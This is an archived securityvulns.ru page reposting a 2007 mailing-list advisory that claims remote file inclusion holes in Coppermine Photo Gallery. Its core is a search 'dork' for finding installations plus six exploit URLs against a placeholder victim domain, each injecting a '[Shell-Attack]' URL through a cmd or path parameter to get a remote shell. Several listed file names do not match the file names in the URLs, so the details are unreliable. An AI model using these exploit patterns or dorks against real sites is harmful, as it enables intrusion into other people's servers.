Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabi

  Remote File Include In  copyright © James Coyle; JCcorp

  ManageEngine Firewall Analyzer arbitrary file disclosure to authorized user

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:24.03.2007
Subject:Remote File Include In Coppermine Photo Gallery

By Hasadya Raed
Contact : Raed@BsdMail.Com
------------------------------------
Script :  Coppermine Photo Gallery
Dork : Copyright (c) 2003-2006 Coppermine Dev Team
------------------------------------
B.Files :
processor.php
include/functions.php
include/picmgmt.inc.php
include/plugin_api.inc.php
index.php
pluginmgr.php
-----------------------------------
Expl :

http://www.Victim.Com/path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/path/index.php?path=[Shell-Attack]
http://www.Victim.Com/path/pluginmgr.php?path=[Shell-Attack]

--
_______________________________________________
Get your free email from http://bsdmail.com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Πειςθνγ@Mail.ru